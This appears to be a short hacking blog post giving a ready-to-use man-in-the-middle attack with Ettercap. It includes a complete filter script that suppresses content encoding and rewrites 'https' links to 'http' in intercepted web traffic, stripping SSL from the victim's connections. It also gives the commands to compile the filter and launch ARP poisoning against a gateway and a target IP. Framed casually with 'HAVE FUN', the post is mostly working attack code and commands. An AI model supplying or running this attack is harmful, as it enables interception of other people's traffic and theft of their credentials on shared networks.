MITM ::
MITM attacks are pretty easy to perform on a local network but the tools tend to crash a LOT. Cain (Windows) is a little more stable than Ettercap but I prefer it over Cain because it doesn’t spoof SSL that I consider too loud depending on the attack. NOTE: Ettercap runs better on text mode.
Getting things done ::
Here is the FILTER.
##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##
##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
}
}
#####################
## Replace Content ##
#####################
##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
# msg("[HTTP Response Filter] HTTP request seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
}
##
# Response
if (ip.proto == TCP && tcp.src == 80) {
# msg("[HTTP Response Filter] HTTP response seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
}
Just place it in HTTPS.FILTER, then compile it using "etterfilter" with the command :
etterfilter https.filter -o https.ef
Then You good to go with :
ettercap -T -q -F https.ef -M ARP:remote /GATEWAY/ /TARGET_IP/ .
HAVE FUN =)
No comments:
Post a Comment